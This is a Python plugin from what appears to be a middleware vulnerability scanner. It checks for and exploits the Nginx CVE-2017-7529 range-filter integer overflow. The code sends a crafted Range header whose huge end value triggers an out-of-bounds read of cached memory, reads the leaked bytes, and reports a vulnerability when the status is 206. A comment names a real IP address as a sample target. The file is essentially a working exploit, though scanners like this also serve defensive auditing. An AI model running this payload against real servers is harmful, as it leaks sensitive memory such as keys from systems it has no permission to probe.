Files
N-MiddlewareScan/plugins/Nginx_special_plugin_.py

30 lines
1.1 KiB
Python
Raw Normal View History

2019-03-30 23:03:09 +08:00
#coding=utf-8
# Nginx信息泄露python3 NginxCVE-2017-7529.py http://207.246.80.61:8000/proxy/demo.png
# 敏感信息有KEY等等
import requests
from termcolor import cprint
class NginxCVE_2017_7529():
def attack(self, url):
#url = r'http://207.246.80.61:8000/'
try:
a = requests.get(url)
start = int(a.headers['Content-Length']) + 300
end = 0x8000000000000000 - start
headers = {
"Range": "bytes=-{},-{}".format(start, end)
}
res = requests.get(url=url, headers=headers, stream=True, timeout=10)
ret = res.raw.read(500)
code = res.status_code
if code == 206:
print( "[+]存在Nginx越界读取缓存漏洞CVE-2017-7529漏洞...(低危)")
else:
print("[-]不存在Nginx越界读取缓存漏洞CVE-2017-7529漏洞...(低危)")
except Exception as e:
cprint("[-] " + __file__ + "====>连接超时", "cyan")
def Nginx_special_plugin_(arg,config):
NginxCVE_2017_7529().attack(arg.url)